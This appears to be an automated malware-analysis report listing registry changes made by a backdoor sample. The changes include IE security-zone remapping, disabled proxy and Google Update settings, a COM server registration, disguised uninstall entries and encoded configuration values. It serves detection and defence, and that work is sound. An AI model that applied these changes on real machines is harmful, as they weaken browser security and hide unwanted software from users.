[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"ServerExecutable" = "c:\%original file name%.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A2 BC A7 08 2A EB 60 D1 52 C0 23 81 D7 42 92 6B"
[HKCU\Software\Classes\Interface\{3B3F3AAD-FB97-49FF-BFEE-D22869AC4326}\TypeLib]
"(Default)" = "{157B1AA6-3E5C-404A-9118-C1D91F537040}"
[HKCU\Software\Classes\TypeLib\{157B1AA6-3E5C-404A-9118-C1D91F537040}\1.0\0\win32]
"(Default)" = "c:\%original file name%.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Classes\Interface\{3B3F3AAD-FB97-49FF-BFEE-D22869AC4326}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]
"(Default)" = "TinyJSObject Class"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
"(Default)" = "1.0"
[HKCU\Software\WebApp\Styles]
"MaxScriptStatements" = "4294967295"
The Backdoor modifies IE security-zone settings so that all local web nodes (names containing no dots) that are not assigned to any zone are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Backdoor modifies IE security-zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Backdoor modifies IE security-zone settings to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Backdoor deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process %original file name%.exe:1888 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
"(Default)" = "{7E77E9F2-D76B-4D54-B515-9A7F93DF03DF}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 20 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\CCC0\temp\%original file name%.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"ServerExecutable" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\CCC0\temp\%original file name%.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "04 F2 48 D7 33 BA 18 38 EE F1 A4 96 76 F7 F7 CC"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]
"(Default)" = "TinyJSObject Class"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
"(Default)" = "1.0"
[HKCU\Software\WebApp\Styles]
"MaxScriptStatements" = "4294967295"
The Backdoor modifies IE security-zone settings so that all local web nodes (names containing no dots) that are not assigned to any zone are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Backdoor modifies IE security-zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Backdoor modifies IE security-zone settings to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Backdoor deletes the following registry key(s):
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Programmable]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]
The Backdoor deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process %original file name%.exe:188 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
"(Default)" = "{7E77E9F2-D76B-4D54-B515-9A7F93DF03DF}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 21 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Policies\Google\Update]
"Update{8A69D345-D564-463C-AFF1-A69D9E530F96}" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3CCAC59C-6F9D-4545-EACD-568494150D4E}]
"InstallDate" = "20150509"
[HKLM\SOFTWARE\Policies\Google\Update]
"AutoUpdateCheckPeriodMinutes" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3CCAC59C-6F9D-4545-EACD-568494150D4E}]
"DisplayIcon" = "%System%\msiexec.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\CCC0\temp\%original file name%.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3CCAC59C-6F9D-4545-EACD-568494150D4E}]
"CategoryName" = "Apps"
[HKLM\SOFTWARE\Policies\Google\Update]
"DisableAutoUpdateChecksCheckboxValue" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3CCAC59C-6F9D-4545-EACD-568494150D4E}]
"UninstallString" = "%Program Files%\BrrOwsiNGclEarly\pbk7K2hRvvulDG.exe /s /n /i:ExecuteCommands;UninstallCommands"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3CCAC59C-6F9D-4545-EACD-568494150D4E}]
"DisplayName" = "BrrOwsiNGclEarly"
"ProductName" = "BrrOwsiNGclEarly"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Setup\6.0]
"DoNotOfferIE6" = "1"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"ServerExecutable" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\CCC0\temp\%original file name%.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F9 F2 FF CC 16 67 EB 1A 69 B1 07 24 17 C6 05 E8"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Setup\6.0]
"DoNotOfferIE6AU" = "1"
"DoNotAllowIE6" = "1"
[HKLM\SOFTWARE\Policies\Google\Update]
"UpdateDefault" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3CCAC59C-6F9D-4545-EACD-568494150D4E}]
"NoModify" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3CCAC59C-6F9D-4545-EACD-568494150D4E}]
"SilentUninstall" = "%Program Files%\BrrOwsiNGclEarly\pbk7K2hRvvulDG.exe /s /n /i:ExecuteCommands;UninstallCommands"
"NoRepair" = "1"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]
"(Default)" = "TinyJSObject Class"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
"(Default)" = "1.0"
[HKCU\Software\WebApp\Styles]
"MaxScriptStatements" = "4294967295"
The Backdoor modifies IE security-zone settings so that all local web nodes (names containing no dots) that are not assigned to any zone are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Backdoor modifies IE security-zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Backdoor modifies IE security-zone settings to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Backdoor deletes the following registry key(s):
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Programmable]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]
The Backdoor deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process %original file name%.exe:1016 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
"(Default)" = "{7E77E9F2-D76B-4D54-B515-9A7F93DF03DF}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3112BDB8-7DB9-279D-EC5F-30BC1ABC266C}]
"ProductName" = "Chime"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 22 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Policies\Google\Update]
"Update{8A69D345-D564-463C-AFF1-A69D9E530F96}" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3112BDB8-7DB9-279D-EC5F-30BC1ABC266C}]
"NoModify" = "1"
[HKLM\SOFTWARE\Policies\Google\Update]
"AutoUpdateCheckPeriodMinutes" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3112BDB8-7DB9-279D-EC5F-30BC1ABC266C}]
"UninstallString" = "%Program Files%\Chime\Chime.exe /s /n /i:ExecuteCommands;UninstallCommands"
[HKLM\SOFTWARE\Google\Update\ClientState\{4DC8B4CA-1BDA-483e-B5FA-D3C12E15B62D}]
"ap" = "-dev-multi-chrome"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Google\Update\ClientState\{8A69D345-D564-463C-AFF1-A69D9E530F96}]
"ap" = "2.0-dev-multi-chrome"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\CCC0\temp\%original file name%.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3112BDB8-7DB9-279D-EC5F-30BC1ABC266C}]
"InstallDate" = "20150509"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Policies\Google\Update]
"DisableAutoUpdateChecksCheckboxValue" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3112BDB8-7DB9-279D-EC5F-30BC1ABC266C}]
"CategoryName" = "Apps"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3112BDB8-7DB9-279D-EC5F-30BC1ABC266C}]
"NoRepair" = "1"
"DisplayIcon" = "%System%\msiexec.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"ServerExecutable" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\CCC0\temp\%original file name%.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "97 4B B3 27 69 E7 96 8C 9C 2F D3 6F 20 3D 01 25"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3112BDB8-7DB9-279D-EC5F-30BC1ABC266C}]
"SilentUninstall" = "%Program Files%\Chime\Chime.exe /s /n /i:ExecuteCommands;UninstallCommands"
[HKLM\SOFTWARE\Policies\Google\Update]
"UpdateDefault" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3112BDB8-7DB9-279D-EC5F-30BC1ABC266C}]
"DisplayName" = "Chime"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]
"(Default)" = "TinyJSObject Class"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
"(Default)" = "1.0"
[HKCU\Software\WebApp\Styles]
"MaxScriptStatements" = "4294967295"
The Backdoor modifies IE security-zone settings so that all local web nodes (names containing no dots) that are not assigned to any zone are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Backdoor modifies IE security-zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Backdoor modifies IE security-zone settings to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Backdoor deletes the following registry key(s):
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Programmable]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]
The Backdoor deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process rundll32.exe:1432 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"a1dcff5b" = "V/////%%"
"0dc3ee96" = "/P////%%"
"1c311243" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"
"a2e3b941" = "///%"
"6185d035" = "Vx/2/Cx/V//l////"
"d1abcdb6" = "///%"
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\00000000]
"493c7345" = "i01 06b0o01D06I0px0S06I0px1O00%%, pl1e06b0i01T0780jx1B06E0nU1h02I0nl1 07x0"
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"f0bf0bde" = "///%"
"d94388d2" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"
"c6c5dd44" = "V/////%%"
"587b5709" = "V/////%%"
"7367429f" = "///%"
"27ddcf6f" = "///%"
"48bd1aff" = "V/////%%"
"37b7a6d8" = "UlAr/XJ/c//k////"
"e8f9dcc7" = "UlAr/XJ/c//k////"
"c24899a6" = "VP/g/CV/Vl/2/Cx////%"
"fe94ce1e" = "V/////%%"
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\00000000]
"a47da861" = "o01O07x0m00K02E0aU1e0700m01 0640ml1e06I0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1e0700m01e0780px0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06t0i01A0780px1 02I0nU1M06m0aU1P06I0ox1S07b0i01e06U0n00T00%%, o01O07x0m00K02E0aU1Y06h0ql1M0640ml1J07b0qx1A06t0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1g06E0nx0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1N07t0oU1N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1Z0640n01Y02I0nl1 07x0aU1P06I0ox1S07b0i01e06U0n00T00%%"
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"f1f24e29" = "Vl/l/C/////%"
"7f69fa1f" = "///%"
"f2c53c49" = "UlAr/XJ/c//k////"
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\00000000]
"370856c7" = ""
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"2e22d94e" = "///%"
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\00000000]
"3efeb33e" = ""
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"060df2cd" = "c/Au/XV/H/Ap/X2/GP/j/Xt/axAv/X6////%"
"c5705860" = "Vx////%%"
"8b9e4cbc" = "V/////%%"
"c99a5f5c" = "///%"
"3c09c42b" = "///%"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F3 A6 62 68 D8 F2 D2 66 8E 39 88 BD C0 BD DF 21"
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"51d2f2ea" = "PPAf/Xh/alAf/XJ/bxAR/Xt/blAu////"
"0e93c3f3" = "///%"
"65114b36" = "Vl/l////"
"e46c271e" = "///%"
"0c230bcb" = "///%"
"72758a5d" = "///%"
"bbf88800" = "///%"
"a0743acc" = "N/////%%"
"2d71d5ab" = "V/////%%"
"38583bc3" = "Ml/2/CF/M//g/CZ////%"
"f6ad6fa6" = "V/////%%"
"340d3099" = "/P////%%"
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"iiid" = "1"
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"1520c6f1" = "V/////%%"
"414bc593" = "///%"
